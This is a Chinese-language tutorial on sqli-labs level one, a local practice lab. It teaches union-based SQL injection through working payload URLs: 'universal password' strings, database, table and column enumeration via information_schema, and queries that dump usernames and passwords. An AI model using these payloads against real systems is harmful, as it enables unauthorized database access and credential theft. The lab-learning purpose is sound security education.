SQL注入之核心语法讲解

SQL实验室第一关

前言

一、搭建sqli-labs实验环境

下载sqli-labs到phpstudy的www目录下 打开localhost/sqli-labs运行即可

二、SQL注入核心语法

1.构造万能密码和简单构造注入

（1）注入语句 ‘~’ 相当于16进制的0x7e 万能密码 or ‘1’ =1 ’ and ‘1’=‘1 ’ and 1=2 union select 1,user(),3- -+ 前面加’是为了闭合后面的’ （2）group_concat(string)

2.核心语法获取数据库信息

（1）SQL手工注入方法 select schema_name from information_schema.schemata（查库） select table_name from information_schema.tables where table_schema=库名（查表） select column_name from information_schema.colums where table_name=表名（查列） select 列名 from 库名.表名（查数据）

例子： 查看数据库 http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(schema_name) from information_schema.schemata)- -+ 查看表 http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)- -+

查看表中的数据 http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(username,0x7e,password) from security.users)- -+ 这里总结一些SQL注入查看信息 http://192.168.222.4/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,user(),3- -+

手工注入获取数据库信息内容 http://192.168.222.4/sqli-labs/Less-1/?id=2’ order by 3- -+ 查看可用字段的长度 http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,3- -+ http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(schema_name) from information_schema.schemata)- -+ 查看数据库

http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select concat_ws(’~’,username,password)from security.users limit 0,1)- -+ 只会返回一个数据（查看表的数据）

http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select concat_ws(0x7e,username,password)from security.users limit 0,1)

http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select group_concat(username,0x7e,password)from security.users)- -+ 会返回所有数据

http://192.168.222.4/sqli-labs/Less-1/?id=’ union select 1,2,(select database())- -+ 查看数据库

总结